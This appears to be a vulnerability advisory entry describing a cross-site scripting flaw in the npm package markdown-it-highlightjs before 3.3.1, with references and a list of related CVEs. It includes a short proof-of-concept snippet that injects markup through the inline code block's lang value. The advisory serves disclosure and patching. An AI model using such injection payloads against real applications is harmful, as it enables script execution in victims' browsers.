Description
This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature. const markdownItHighlightjs = require("markdown-it-highlightjs"); const md = require('markdown-it'); const reuslt_xss = md() .use(markdownItHighlightjs, { inline: true }) .render('console.log(42){.">js}'); console.log(reuslt_xss);
Remediation
References
https://snyk.io/vuln/SNYK-JS-MARKDOWNITHIGHLIGHTJS-1040461
https://github.com/valeriangalliat/markdown-it-highlightjs/pull/14
https://github.com/valeriangalliat/markdown-it-highlightjs/blob/v3.3.0/index.js%23L52
Related Vulnerabilities
CVE-2022-22968 Vulnerability in maven package org.springframework:spring-context
CVE-2019-10312 Vulnerability in maven package org.jenkins-ci.plugins:ansible-tower
CVE-2022-41915 Vulnerability in maven package io.netty:netty-codec
CVE-2020-15095 Vulnerability in maven package org.webjars.npm:npm
CVE-2020-2268 Vulnerability in maven package org.jenkins-ci.plugins:mongodb